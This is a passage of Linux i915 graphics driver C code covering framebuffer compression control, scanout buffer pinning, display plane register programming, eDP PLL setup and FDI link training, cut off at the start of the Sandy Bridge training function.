	struct drm_i915_private *dev_priv = dev->dev_private;
	struct drm_framebuffer *fb = crtc->fb;
	struct intel_framebuffer *intel_fb = to_intel_framebuffer(fb);
	struct drm_i915_gem_object *obj = intel_fb->obj;
	struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
	int plane = intel_crtc->plane == 0 ? DPFC_CTL_PLANEA : DPFC_CTL_PLANEB;
	unsigned long stall_watermark = 200;
	u32 dpfc_ctl;

	/* Preserve only the reserved bits, then rebuild the control value. */
	dpfc_ctl = I915_READ(ILK_DPFC_CONTROL);
	dpfc_ctl &= DPFC_RESERVED;
	dpfc_ctl |= (plane | DPFC_CTL_LIMIT_1X);
	/* Set persistent mode for front-buffer rendering, ala X. */
	dpfc_ctl |= DPFC_CTL_PERSISTENT_MODE;
	dpfc_ctl |= (DPFC_CTL_FENCE_EN | obj->fence_reg);
	I915_WRITE(ILK_DPFC_CHICKEN, DPFC_HT_MODIFY);

	I915_WRITE(ILK_DPFC_RECOMP_CTL, DPFC_RECOMP_STALL_EN |
		   (stall_watermark << DPFC_RECOMP_STALL_WM_SHIFT) |
		   (interval << DPFC_RECOMP_TIMER_COUNT_SHIFT));
	I915_WRITE(ILK_DPFC_FENCE_YOFF, crtc->y);
	I915_WRITE(ILK_FBC_RT_BASE, obj->gtt_offset | ILK_FBC_RT_VALID);
	/* enable it... */
	I915_WRITE(ILK_DPFC_CONTROL, dpfc_ctl | DPFC_CTL_EN);

	if (IS_GEN6(dev)) {
		/* SNB needs the CPU fence programmed separately and the
		 * blitter hooked up to FBC invalidation. */
		I915_WRITE(SNB_DPFC_CTL_SA,
			   SNB_CPU_FENCE_ENABLE | obj->fence_reg);
		I915_WRITE(DPFC_CPU_FENCE_OFFSET, crtc->y);
		sandybridge_blit_fbc_update(dev);
	}

	DRM_DEBUG_KMS("enabled fbc on plane %d\n", intel_crtc->plane);
}
/* Disable Ironlake-style (ILK DPFC) framebuffer compression if active. */
static void ironlake_disable_fbc(struct drm_device *dev)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	u32 ctl;

	/* Disable compression */
	ctl = I915_READ(ILK_DPFC_CONTROL);
	if ((ctl & DPFC_CTL_EN) == 0)
		return;

	I915_WRITE(ILK_DPFC_CONTROL, ctl & ~DPFC_CTL_EN);
	DRM_DEBUG_KMS("disabled FBC\n");
}
static bool ironlake_fbc_enabled(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
return I915_READ(ILK_DPFC_CONTROL) & DPFC_CTL_EN;
}
/* Generation-independent FBC status query; false when the platform has no
 * FBC support (no fbc_enabled hook installed). */
bool intel_fbc_enabled(struct drm_device *dev)
{
	struct drm_i915_private *dev_priv = dev->dev_private;

	return dev_priv->display.fbc_enabled ?
		dev_priv->display.fbc_enabled(dev) : false;
}
/* Deferred-work callback that performs the actual FBC enable scheduled by
 * intel_enable_fbc().  Runs under struct_mutex; only acts if this work item
 * is still the pending one and the crtc's fb has not changed meanwhile. */
static void intel_fbc_work_fn(struct work_struct *__work)
{
	struct intel_fbc_work *work =
		container_of(to_delayed_work(__work),
			     struct intel_fbc_work, work);
	struct drm_device *dev = work->crtc->dev;
	struct drm_i915_private *dev_priv = dev->dev_private;

	mutex_lock(&dev->struct_mutex);
	if (work == dev_priv->fbc_work) {
		/* Double check that we haven't switched fb without cancelling
		 * the prior work.
		 */
		if (work->crtc->fb == work->fb) {
			dev_priv->display.enable_fbc(work->crtc,
						     work->interval);

			/* Record what FBC is now tracking so intel_update_fbc()
			 * can skip redundant re-enables. */
			dev_priv->cfb_plane = to_intel_crtc(work->crtc)->plane;
			dev_priv->cfb_fb = work->crtc->fb->base.id;
			dev_priv->cfb_y = work->crtc->y;
		}

		dev_priv->fbc_work = NULL;
	}
	mutex_unlock(&dev->struct_mutex);

	/* The work item owns its allocation; free it once consumed. */
	kfree(work);
}
/* Cancel any FBC enable scheduled by intel_enable_fbc() that has not yet
 * run.  Caller must hold struct_mutex (that is what makes the check of
 * dev_priv->fbc_work and the kfree race-free against intel_fbc_work_fn). */
static void intel_cancel_fbc_work(struct drm_i915_private *dev_priv)
{
	if (dev_priv->fbc_work == NULL)
		return;

	DRM_DEBUG_KMS("cancelling pending FBC enable\n");

	/* Synchronisation is provided by struct_mutex and checking of
	 * dev_priv->fbc_work, so we can perform the cancellation
	 * entirely asynchronously.
	 */
	if (cancel_delayed_work(&dev_priv->fbc_work->work))
		/* tasklet was killed before being run, clean up */
		kfree(dev_priv->fbc_work);

	/* Mark the work as no longer wanted so that if it does
	 * wake-up (because the work was already running and waiting
	 * for our mutex), it will discover that is no longer
	 * necessary to run.
	 */
	dev_priv->fbc_work = NULL;
}
/* Schedule FBC to be enabled on @crtc after a short delay (~50ms), replacing
 * any previously pending enable.  If the work item cannot be allocated we
 * fall back to enabling synchronously. */
static void intel_enable_fbc(struct drm_crtc *crtc, unsigned long interval)
{
	struct intel_fbc_work *work;
	struct drm_device *dev = crtc->dev;
	struct drm_i915_private *dev_priv = dev->dev_private;

	/* Platform without FBC support: nothing to do. */
	if (!dev_priv->display.enable_fbc)
		return;

	intel_cancel_fbc_work(dev_priv);

	work = kzalloc(sizeof *work, GFP_KERNEL);
	if (work == NULL) {
		/* Out of memory: enable immediately rather than not at all. */
		dev_priv->display.enable_fbc(crtc, interval);
		return;
	}

	work->crtc = crtc;
	work->fb = crtc->fb;
	work->interval = interval;
	INIT_DELAYED_WORK(&work->work, intel_fbc_work_fn);

	dev_priv->fbc_work = work;

	DRM_DEBUG_KMS("scheduling delayed FBC enable\n");

	/* Delay the actual enabling to let pageflipping cease and the
	 * display to settle before starting the compression. Note that
	 * this delay also serves a second purpose: it allows for a
	 * vblank to pass after disabling the FBC before we attempt
	 * to modify the control registers.
	 *
	 * A more complicated solution would involve tracking vblanks
	 * following the termination of the page-flipping sequence
	 * and indeed performing the enable as a co-routine and not
	 * waiting synchronously upon the vblank.
	 */
	schedule_delayed_work(&work->work, msecs_to_jiffies(50));
}
/* Disable FBC immediately, first cancelling any delayed enable still
 * pending, and invalidate the cached plane so the next update re-enables. */
void intel_disable_fbc(struct drm_device *dev)
{
	struct drm_i915_private *dev_priv = dev->dev_private;

	/* Must cancel before disabling, or the pending work could
	 * re-enable FBC behind our back. */
	intel_cancel_fbc_work(dev_priv);

	if (!dev_priv->display.disable_fbc)
		return;

	dev_priv->display.disable_fbc(dev);
	dev_priv->cfb_plane = -1;
}
/**
 * intel_update_fbc - enable/disable FBC as needed
 * @dev: the drm_device
 *
 * Set up the framebuffer compression hardware at mode set time.  We
 * enable it if possible:
 *   - plane A only (on pre-965)
 *   - no pixel multiply/line duplication
 *   - no alpha buffer discard
 *   - no dual wide
 *   - framebuffer <= 2048 in width, 1536 in height
 *
 * We can't assume that any compression will take place (worst case),
 * so the compressed buffer has to be the same size as the uncompressed
 * one.  It also must reside (along with the line length buffer) in
 * stolen memory.
 *
 * We need to enable/disable FBC on a global basis.
 */
static void intel_update_fbc(struct drm_device *dev)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	struct drm_crtc *crtc = NULL, *tmp_crtc;
	struct intel_crtc *intel_crtc;
	struct drm_framebuffer *fb;
	struct intel_framebuffer *intel_fb;
	struct drm_i915_gem_object *obj;
	int enable_fbc;

	DRM_DEBUG_KMS("\n");

	if (!i915_powersave)
		return;

	if (!I915_HAS_FBC(dev))
		return;

	/*
	 * If FBC is already on, we just have to verify that we can
	 * keep it that way...
	 * Need to disable if:
	 *   - more than one pipe is active
	 *   - changing FBC params (stride, fence, mode)
	 *   - new fb is too large to fit in compressed buffer
	 *   - going to an unsupported config (interlace, pixel multiply, etc.)
	 */
	/* Find the single enabled crtc with a framebuffer; FBC is a
	 * one-pipe-only feature. */
	list_for_each_entry(tmp_crtc, &dev->mode_config.crtc_list, head) {
		if (tmp_crtc->enabled && tmp_crtc->fb) {
			if (crtc) {
				DRM_DEBUG_KMS("more than one pipe active, disabling compression\n");
				dev_priv->no_fbc_reason = FBC_MULTIPLE_PIPES;
				goto out_disable;
			}
			crtc = tmp_crtc;
		}
	}

	if (!crtc || crtc->fb == NULL) {
		DRM_DEBUG_KMS("no output, disabling\n");
		dev_priv->no_fbc_reason = FBC_NO_OUTPUT;
		goto out_disable;
	}

	intel_crtc = to_intel_crtc(crtc);
	fb = crtc->fb;
	intel_fb = to_intel_framebuffer(fb);
	obj = intel_fb->obj;

	/* Module param < 0 means "per-chip default": off for gen <= 5. */
	enable_fbc = i915_enable_fbc;
	if (enable_fbc < 0) {
		DRM_DEBUG_KMS("fbc set to per-chip default\n");
		enable_fbc = 1;
		if (INTEL_INFO(dev)->gen <= 5)
			enable_fbc = 0;
	}
	if (!enable_fbc) {
		DRM_DEBUG_KMS("fbc disabled per module param\n");
		dev_priv->no_fbc_reason = FBC_MODULE_PARAM;
		goto out_disable;
	}
	/* Worst case is no compression, so the CFB must hold the whole fb. */
	if (intel_fb->obj->base.size > dev_priv->cfb_size) {
		DRM_DEBUG_KMS("framebuffer too large, disabling "
			      "compression\n");
		dev_priv->no_fbc_reason = FBC_STOLEN_TOO_SMALL;
		goto out_disable;
	}
	if ((crtc->mode.flags & DRM_MODE_FLAG_INTERLACE) ||
	    (crtc->mode.flags & DRM_MODE_FLAG_DBLSCAN)) {
		DRM_DEBUG_KMS("mode incompatible with compression, "
			      "disabling\n");
		dev_priv->no_fbc_reason = FBC_UNSUPPORTED_MODE;
		goto out_disable;
	}
	if ((crtc->mode.hdisplay > 2048) ||
	    (crtc->mode.vdisplay > 1536)) {
		DRM_DEBUG_KMS("mode too large for compression, disabling\n");
		dev_priv->no_fbc_reason = FBC_MODE_TOO_LARGE;
		goto out_disable;
	}
	if ((IS_I915GM(dev) || IS_I945GM(dev)) && intel_crtc->plane != 0) {
		DRM_DEBUG_KMS("plane not 0, disabling compression\n");
		dev_priv->no_fbc_reason = FBC_BAD_PLANE;
		goto out_disable;
	}

	/* The use of a CPU fence is mandatory in order to detect writes
	 * by the CPU to the scanout and trigger updates to the FBC.
	 */
	if (obj->tiling_mode != I915_TILING_X ||
	    obj->fence_reg == I915_FENCE_REG_NONE) {
		DRM_DEBUG_KMS("framebuffer not tiled or fenced, disabling compression\n");
		dev_priv->no_fbc_reason = FBC_NOT_TILED;
		goto out_disable;
	}

	/* If the kernel debugger is active, always disable compression */
	if (in_dbg_master())
		goto out_disable;

	/* If the scanout has not changed, don't modify the FBC settings.
	 * Note that we make the fundamental assumption that the fb->obj
	 * cannot be unpinned (and have its GTT offset and fence revoked)
	 * without first being decoupled from the scanout and FBC disabled.
	 */
	if (dev_priv->cfb_plane == intel_crtc->plane &&
	    dev_priv->cfb_fb == fb->base.id &&
	    dev_priv->cfb_y == crtc->y)
		return;

	if (intel_fbc_enabled(dev)) {
		/* We update FBC along two paths, after changing fb/crtc
		 * configuration (modeswitching) and after page-flipping
		 * finishes. For the latter, we know that not only did
		 * we disable the FBC at the start of the page-flip
		 * sequence, but also more than one vblank has passed.
		 *
		 * For the former case of modeswitching, it is possible
		 * to switch between two FBC valid configurations
		 * instantaneously so we do need to disable the FBC
		 * before we can modify its control registers. We also
		 * have to wait for the next vblank for that to take
		 * effect. However, since we delay enabling FBC we can
		 * assume that a vblank has passed since disabling and
		 * that we can safely alter the registers in the deferred
		 * callback.
		 *
		 * In the scenario that we go from a valid to invalid
		 * and then back to valid FBC configuration we have
		 * no strict enforcement that a vblank occurred since
		 * disabling the FBC. However, along all current pipe
		 * disabling paths we do need to wait for a vblank at
		 * some point. And we wait before enabling FBC anyway.
		 */
		DRM_DEBUG_KMS("disabling active FBC for update\n");
		intel_disable_fbc(dev);
	}

	intel_enable_fbc(crtc, 500);
	return;

out_disable:
	/* Multiple disables should be harmless */
	if (intel_fbc_enabled(dev)) {
		DRM_DEBUG_KMS("unsupported config, disabling FBC\n");
		intel_disable_fbc(dev);
	}
}
/* Pin @obj into the GTT at scanout-compatible alignment and install a fence
 * register for tiled buffers.  @pipelined, if non-NULL, is the ring whose
 * in-flight rendering the pin/fence may wait behind.  Runs with
 * mm.interruptible temporarily cleared so the operation cannot be aborted
 * by a signal mid-way.  Returns 0 or a negative errno; on error nothing
 * remains pinned (goto-cleanup unwinds). */
int
intel_pin_and_fence_fb_obj(struct drm_device *dev,
			   struct drm_i915_gem_object *obj,
			   struct intel_ring_buffer *pipelined)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	u32 alignment;
	int ret;

	/* Required GTT alignment depends on tiling and generation. */
	switch (obj->tiling_mode) {
	case I915_TILING_NONE:
		if (IS_BROADWATER(dev) || IS_CRESTLINE(dev))
			alignment = 128 * 1024;
		else if (INTEL_INFO(dev)->gen >= 4)
			alignment = 4 * 1024;
		else
			alignment = 64 * 1024;
		break;
	case I915_TILING_X:
		/* pin() will align the object as required by fence */
		alignment = 0;
		break;
	case I915_TILING_Y:
		/* FIXME: Is this true? */
		DRM_ERROR("Y tiled not allowed for scan out buffers\n");
		return -EINVAL;
	default:
		BUG();
	}

	dev_priv->mm.interruptible = false;
	ret = i915_gem_object_pin_to_display_plane(obj, alignment, pipelined);
	if (ret)
		goto err_interruptible;

	/* Install a fence for tiled scan-out. Pre-i965 always needs a
	 * fence, whereas 965+ only requires a fence if using
	 * framebuffer compression.  For simplicity, we always install
	 * a fence as the cost is not that onerous.
	 */
	if (obj->tiling_mode != I915_TILING_NONE) {
		ret = i915_gem_object_get_fence(obj, pipelined);
		if (ret)
			goto err_unpin;
	}

	dev_priv->mm.interruptible = true;
	return 0;

err_unpin:
	i915_gem_object_unpin(obj);
err_interruptible:
	/* Restore interruptible state on every exit path. */
	dev_priv->mm.interruptible = true;
	return ret;
}
/* Program the pre-Ironlake display plane registers for @crtc to scan out
 * @fb starting at pixel (@x, @y).  Assumes the fb object is already pinned
 * and fenced.  Returns 0 or -EINVAL for an unsupported plane/pixel format. */
static int i9xx_update_plane(struct drm_crtc *crtc, struct drm_framebuffer *fb,
			     int x, int y)
{
	struct drm_device *dev = crtc->dev;
	struct drm_i915_private *dev_priv = dev->dev_private;
	struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
	struct intel_framebuffer *intel_fb;
	struct drm_i915_gem_object *obj;
	int plane = intel_crtc->plane;
	unsigned long Start, Offset;
	u32 dspcntr;
	u32 reg;

	/* Only planes 0 and 1 exist on these parts. */
	switch (plane) {
	case 0:
	case 1:
		break;
	default:
		DRM_ERROR("Can't update plane %d in SAREA\n", plane);
		return -EINVAL;
	}

	intel_fb = to_intel_framebuffer(fb);
	obj = intel_fb->obj;

	reg = DSPCNTR(plane);
	dspcntr = I915_READ(reg);
	/* Mask out pixel format bits in case we change it */
	dspcntr &= ~DISPPLANE_PIXFORMAT_MASK;
	switch (fb->bits_per_pixel) {
	case 8:
		dspcntr |= DISPPLANE_8BPP;
		break;
	case 16:
		if (fb->depth == 15)
			dspcntr |= DISPPLANE_15_16BPP;
		else
			dspcntr |= DISPPLANE_16BPP;
		break;
	case 24:
	case 32:
		dspcntr |= DISPPLANE_32BPP_NO_ALPHA;
		break;
	default:
		DRM_ERROR("Unknown color depth %d\n", fb->bits_per_pixel);
		return -EINVAL;
	}
	/* Tiled scanout is only programmable on gen4+. */
	if (INTEL_INFO(dev)->gen >= 4) {
		if (obj->tiling_mode != I915_TILING_NONE)
			dspcntr |= DISPPLANE_TILED;
		else
			dspcntr &= ~DISPPLANE_TILED;
	}

	I915_WRITE(reg, dspcntr);

	Start = obj->gtt_offset;
	/* Byte offset of pixel (x, y) within the framebuffer. */
	Offset = y * fb->pitch + x * (fb->bits_per_pixel / 8);

	DRM_DEBUG_KMS("Writing base %08lX %08lX %d %d %d\n",
		      Start, Offset, x, y, fb->pitch);
	I915_WRITE(DSPSTRIDE(plane), fb->pitch);
	if (INTEL_INFO(dev)->gen >= 4) {
		/* gen4+ splits base into surface + tile offset registers. */
		I915_WRITE(DSPSURF(plane), Start);
		I915_WRITE(DSPTILEOFF(plane), (y << 16) | x);
		I915_WRITE(DSPADDR(plane), Offset);
	} else
		I915_WRITE(DSPADDR(plane), Start + Offset);
	POSTING_READ(reg);

	return 0;
}
/* Program the Ironlake+ display plane registers for @crtc to scan out @fb
 * starting at pixel (@x, @y).  Stricter than i9xx_update_plane(): only a
 * limited set of depth/bpp combinations is accepted.  Returns 0 or -EINVAL. */
static int ironlake_update_plane(struct drm_crtc *crtc,
				 struct drm_framebuffer *fb, int x, int y)
{
	struct drm_device *dev = crtc->dev;
	struct drm_i915_private *dev_priv = dev->dev_private;
	struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
	struct intel_framebuffer *intel_fb;
	struct drm_i915_gem_object *obj;
	int plane = intel_crtc->plane;
	unsigned long Start, Offset;
	u32 dspcntr;
	u32 reg;

	/* Only planes 0 and 1 exist. */
	switch (plane) {
	case 0:
	case 1:
		break;
	default:
		DRM_ERROR("Can't update plane %d in SAREA\n", plane);
		return -EINVAL;
	}

	intel_fb = to_intel_framebuffer(fb);
	obj = intel_fb->obj;

	reg = DSPCNTR(plane);
	dspcntr = I915_READ(reg);
	/* Mask out pixel format bits in case we change it */
	dspcntr &= ~DISPPLANE_PIXFORMAT_MASK;
	switch (fb->bits_per_pixel) {
	case 8:
		dspcntr |= DISPPLANE_8BPP;
		break;
	case 16:
		/* Only 5:6:5 is supported at 16 bpp on ILK+. */
		if (fb->depth != 16)
			return -EINVAL;

		dspcntr |= DISPPLANE_16BPP;
		break;
	case 24:
	case 32:
		if (fb->depth == 24)
			dspcntr |= DISPPLANE_32BPP_NO_ALPHA;
		else if (fb->depth == 30)
			dspcntr |= DISPPLANE_32BPP_30BIT_NO_ALPHA;
		else
			return -EINVAL;
		break;
	default:
		DRM_ERROR("Unknown color depth %d\n", fb->bits_per_pixel);
		return -EINVAL;
	}

	if (obj->tiling_mode != I915_TILING_NONE)
		dspcntr |= DISPPLANE_TILED;
	else
		dspcntr &= ~DISPPLANE_TILED;

	/* must disable */
	dspcntr |= DISPPLANE_TRICKLE_FEED_DISABLE;

	I915_WRITE(reg, dspcntr);

	Start = obj->gtt_offset;
	/* Byte offset of pixel (x, y) within the framebuffer. */
	Offset = y * fb->pitch + x * (fb->bits_per_pixel / 8);

	DRM_DEBUG_KMS("Writing base %08lX %08lX %d %d %d\n",
		      Start, Offset, x, y, fb->pitch);
	I915_WRITE(DSPSTRIDE(plane), fb->pitch);
	I915_WRITE(DSPSURF(plane), Start);
	I915_WRITE(DSPTILEOFF(plane), (y << 16) | x);
	I915_WRITE(DSPADDR(plane), Offset);
	POSTING_READ(reg);

	return 0;
}
/* Assume fb object is pinned & idle & fenced and just update base pointers.
 * Dispatches to the per-generation update_plane hook, then refreshes FBC
 * state and bumps the PLL clock for the newly-active scanout.  @state is
 * unused here beyond satisfying the atomic-modeset callback signature. */
static int
intel_pipe_set_base_atomic(struct drm_crtc *crtc, struct drm_framebuffer *fb,
			   int x, int y, enum mode_set_atomic state)
{
	struct drm_device *dev = crtc->dev;
	struct drm_i915_private *dev_priv = dev->dev_private;
	int ret;

	ret = dev_priv->display.update_plane(crtc, fb, x, y);
	if (ret)
		return ret;

	intel_update_fbc(dev);
	intel_increase_pllclock(crtc);

	return 0;
}
/* Full (non-atomic) scanout base update for @crtc: pin & fence the new fb,
 * wait for any outstanding flips/rendering on the old fb, program the plane,
 * then unpin the old fb and mirror the new offsets into the legacy SAREA.
 * Returns 0 or a negative errno. */
static int
intel_pipe_set_base(struct drm_crtc *crtc, int x, int y,
		    struct drm_framebuffer *old_fb)
{
	struct drm_device *dev = crtc->dev;
	struct drm_i915_master_private *master_priv;
	struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
	int ret;

	/* no fb bound */
	if (!crtc->fb) {
		DRM_ERROR("No FB bound\n");
		return 0;
	}

	switch (intel_crtc->plane) {
	case 0:
	case 1:
		break;
	default:
		DRM_ERROR("no plane for crtc\n");
		return -EINVAL;
	}

	mutex_lock(&dev->struct_mutex);
	ret = intel_pin_and_fence_fb_obj(dev,
					 to_intel_framebuffer(crtc->fb)->obj,
					 NULL);
	if (ret != 0) {
		mutex_unlock(&dev->struct_mutex);
		DRM_ERROR("pin & fence failed\n");
		return ret;
	}

	if (old_fb) {
		struct drm_i915_private *dev_priv = dev->dev_private;
		struct drm_i915_gem_object *obj = to_intel_framebuffer(old_fb)->obj;

		/* Wait for any in-flight page flips on the old fb to land
		 * (or for the GPU to be declared wedged). */
		wait_event(dev_priv->pending_flip_queue,
			   atomic_read(&dev_priv->mm.wedged) ||
			   atomic_read(&obj->pending_flip) == 0);

		/* Big Hammer, we also need to ensure that any pending
		 * MI_WAIT_FOR_EVENT inside a user batch buffer on the
		 * current scanout is retired before unpinning the old
		 * framebuffer.
		 *
		 * This should only fail upon a hung GPU, in which case we
		 * can safely continue.
		 */
		ret = i915_gem_object_finish_gpu(obj);
		(void) ret;
	}

	ret = intel_pipe_set_base_atomic(crtc, crtc->fb, x, y,
					 LEAVE_ATOMIC_MODE_SET);
	if (ret) {
		i915_gem_object_unpin(to_intel_framebuffer(crtc->fb)->obj);
		mutex_unlock(&dev->struct_mutex);
		DRM_ERROR("failed to update base address\n");
		return ret;
	}

	if (old_fb) {
		/* Let the new scanout latch before unpinning the old fb. */
		intel_wait_for_vblank(dev, intel_crtc->pipe);
		i915_gem_object_unpin(to_intel_framebuffer(old_fb)->obj);
	}

	mutex_unlock(&dev->struct_mutex);

	/* Mirror the new pan offsets into the legacy DRI1 SAREA, if any. */
	if (!dev->primary->master)
		return 0;

	master_priv = dev->primary->master->driver_priv;
	if (!master_priv->sarea_priv)
		return 0;

	if (intel_crtc->pipe) {
		master_priv->sarea_priv->pipeB_x = x;
		master_priv->sarea_priv->pipeB_y = y;
	} else {
		master_priv->sarea_priv->pipeA_x = x;
		master_priv->sarea_priv->pipeA_y = y;
	}

	return 0;
}
/* Select the eDP PLL frequency on DP_A for the given link @clock (kHz):
 * 160MHz for links below 200MHz (with the documented 160MHz workaround
 * register sequence), 270MHz otherwise. */
static void ironlake_set_pll_edp(struct drm_crtc *crtc, int clock)
{
	struct drm_device *dev = crtc->dev;
	struct drm_i915_private *dev_priv = dev->dev_private;
	u32 dpa_ctl;

	DRM_DEBUG_KMS("eDP PLL enable for clock %d\n", clock);
	dpa_ctl = I915_READ(DP_A);
	dpa_ctl &= ~DP_PLL_FREQ_MASK;

	if (clock < 200000) {
		u32 temp;
		dpa_ctl |= DP_PLL_FREQ_160MHZ;
		/* workaround for 160Mhz:
		   1) program 0x4600c bits 15:0 = 0x8124
		   2) program 0x46010 bit 0 = 1
		   3) program 0x46034 bit 24 = 1
		   4) program 0x64000 bit 14 = 1
		   */
		temp = I915_READ(0x4600c);
		temp &= 0xffff0000;
		I915_WRITE(0x4600c, temp | 0x8124);

		temp = I915_READ(0x46010);
		I915_WRITE(0x46010, temp | 1);

		temp = I915_READ(0x46034);
		I915_WRITE(0x46034, temp | (1 << 24));
	} else {
		dpa_ctl |= DP_PLL_FREQ_270MHZ;
	}
	I915_WRITE(DP_A, dpa_ctl);

	/* Flush the write, then give the PLL time to settle. */
	POSTING_READ(DP_A);
	udelay(500);
}
/* Switch the FDI link out of training patterns into normal pixel-data mode
 * on both the CPU TX and PCH RX sides, with enhanced framing enabled. */
static void intel_fdi_normal_train(struct drm_crtc *crtc)
{
	struct drm_device *dev = crtc->dev;
	struct drm_i915_private *dev_priv = dev->dev_private;
	struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
	int pipe = intel_crtc->pipe;
	u32 reg, temp;

	/* enable normal train */
	reg = FDI_TX_CTL(pipe);
	temp = I915_READ(reg);
	if (IS_IVYBRIDGE(dev)) {
		/* IVB uses a different train-pattern field layout. */
		temp &= ~FDI_LINK_TRAIN_NONE_IVB;
		temp |= FDI_LINK_TRAIN_NONE_IVB | FDI_TX_ENHANCE_FRAME_ENABLE;
	} else {
		temp &= ~FDI_LINK_TRAIN_NONE;
		temp |= FDI_LINK_TRAIN_NONE | FDI_TX_ENHANCE_FRAME_ENABLE;
	}
	I915_WRITE(reg, temp);

	reg = FDI_RX_CTL(pipe);
	temp = I915_READ(reg);
	if (HAS_PCH_CPT(dev)) {
		temp &= ~FDI_LINK_TRAIN_PATTERN_MASK_CPT;
		temp |= FDI_LINK_TRAIN_NORMAL_CPT;
	} else {
		temp &= ~FDI_LINK_TRAIN_NONE;
		temp |= FDI_LINK_TRAIN_NONE;
	}
	I915_WRITE(reg, temp | FDI_RX_ENHANCE_FRAME_ENABLE);

	/* wait one idle pattern time */
	POSTING_READ(reg);
	udelay(1000);

	/* IVB wants error correction enabled */
	if (IS_IVYBRIDGE(dev))
		I915_WRITE(reg, I915_READ(reg) | FDI_FS_ERRC_ENABLE |
			   FDI_FE_ERRC_ENABLE);
}
/* Enable the CPT FDI phase-sync pointer for @pipe.  SOUTH_CHICKEN1 requires
 * the override bit to be written first to unlock, then written again
 * together with the enable bit. */
static void cpt_phase_pointer_enable(struct drm_device *dev, int pipe)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	u32 flags = I915_READ(SOUTH_CHICKEN1);

	flags |= FDI_PHASE_SYNC_OVR(pipe);
	I915_WRITE(SOUTH_CHICKEN1, flags); /* once to unlock... */
	flags |= FDI_PHASE_SYNC_EN(pipe);
	I915_WRITE(SOUTH_CHICKEN1, flags); /* then again to enable */
	POSTING_READ(SOUTH_CHICKEN1);
}
/* The FDI link training functions for ILK/Ibexpeak. */
/* Train the CPU-to-PCH FDI link for @crtc: run training pattern 1 until the
 * RX reports bit lock, then pattern 2 until symbol lock, polling FDI_RX_IIR
 * up to 5 times per phase.  Failures are logged but not returned — callers
 * proceed regardless. */
static void ironlake_fdi_link_train(struct drm_crtc *crtc)
{
	struct drm_device *dev = crtc->dev;
	struct drm_i915_private *dev_priv = dev->dev_private;
	struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
	int pipe = intel_crtc->pipe;
	int plane = intel_crtc->plane;
	u32 reg, temp, tries;

	/* FDI needs bits from pipe & plane first */
	assert_pipe_enabled(dev_priv, pipe);
	assert_plane_enabled(dev_priv, plane);

	/* Train 1: umask FDI RX Interrupt symbol_lock and bit_lock bit
	   for train result */
	reg = FDI_RX_IMR(pipe);
	temp = I915_READ(reg);
	temp &= ~FDI_RX_SYMBOL_LOCK;
	temp &= ~FDI_RX_BIT_LOCK;
	I915_WRITE(reg, temp);
	I915_READ(reg);	/* posting read to flush before the delay */
	udelay(150);

	/* enable CPU FDI TX and PCH FDI RX */
	reg = FDI_TX_CTL(pipe);
	temp = I915_READ(reg);
	/* Lane-count field occupies bits 21:19. */
	temp &= ~(7 << 19);
	temp |= (intel_crtc->fdi_lanes - 1) << 19;
	temp &= ~FDI_LINK_TRAIN_NONE;
	temp |= FDI_LINK_TRAIN_PATTERN_1;
	I915_WRITE(reg, temp | FDI_TX_ENABLE);

	reg = FDI_RX_CTL(pipe);
	temp = I915_READ(reg);
	temp &= ~FDI_LINK_TRAIN_NONE;
	temp |= FDI_LINK_TRAIN_PATTERN_1;
	I915_WRITE(reg, temp | FDI_RX_ENABLE);

	POSTING_READ(reg);
	udelay(150);

	/* Ironlake workaround, enable clock pointer after FDI enable*/
	if (HAS_PCH_IBX(dev)) {
		I915_WRITE(FDI_RX_CHICKEN(pipe), FDI_RX_PHASE_SYNC_POINTER_OVR);
		I915_WRITE(FDI_RX_CHICKEN(pipe), FDI_RX_PHASE_SYNC_POINTER_OVR |
			   FDI_RX_PHASE_SYNC_POINTER_EN);
	}

	/* Poll for bit lock; writing the bit back acknowledges it. */
	reg = FDI_RX_IIR(pipe);
	for (tries = 0; tries < 5; tries++) {
		temp = I915_READ(reg);
		DRM_DEBUG_KMS("FDI_RX_IIR 0x%x\n", temp);

		if ((temp & FDI_RX_BIT_LOCK)) {
			DRM_DEBUG_KMS("FDI train 1 done.\n");
			I915_WRITE(reg, temp | FDI_RX_BIT_LOCK);
			break;
		}
	}
	if (tries == 5)
		DRM_ERROR("FDI train 1 fail!\n");

	/* Train 2 */
	reg = FDI_TX_CTL(pipe);
	temp = I915_READ(reg);
	temp &= ~FDI_LINK_TRAIN_NONE;
	temp |= FDI_LINK_TRAIN_PATTERN_2;
	I915_WRITE(reg, temp);

	reg = FDI_RX_CTL(pipe);
	temp = I915_READ(reg);
	temp &= ~FDI_LINK_TRAIN_NONE;
	temp |= FDI_LINK_TRAIN_PATTERN_2;
	I915_WRITE(reg, temp);

	POSTING_READ(reg);
	udelay(150);

	/* Poll for symbol lock; writing the bit back acknowledges it. */
	reg = FDI_RX_IIR(pipe);
	for (tries = 0; tries < 5; tries++) {
		temp = I915_READ(reg);
		DRM_DEBUG_KMS("FDI_RX_IIR 0x%x\n", temp);

		if (temp & FDI_RX_SYMBOL_LOCK) {
			I915_WRITE(reg, temp | FDI_RX_SYMBOL_LOCK);
			DRM_DEBUG_KMS("FDI train 2 done.\n");
			break;
		}
	}
	if (tries == 5)
		DRM_ERROR("FDI train 2 fail!\n");

	DRM_DEBUG_KMS("FDI train done\n");
}
/* SNB B-step FDI TX voltage-swing / pre-emphasis settings, tried in order
 * during link training until the receiver reports lock. */
static const int snb_b_fdi_train_param[] = {
	FDI_LINK_TRAIN_400MV_0DB_SNB_B,
	FDI_LINK_TRAIN_400MV_6DB_SNB_B,
	FDI_LINK_TRAIN_600MV_3_5DB_SNB_B,
	FDI_LINK_TRAIN_800MV_0DB_SNB_B,
};
/* The FDI link training functions for SNB/Cougarpoint. */
/* Train the FDI link for @crtc on SNB: like the ILK version, but each
 * training phase additionally sweeps the four snb_b_fdi_train_param
 * voltage-swing/pre-emphasis settings until the RX reports lock.  Failures
 * are logged but not returned. */
static void gen6_fdi_link_train(struct drm_crtc *crtc)
{
	struct drm_device *dev = crtc->dev;
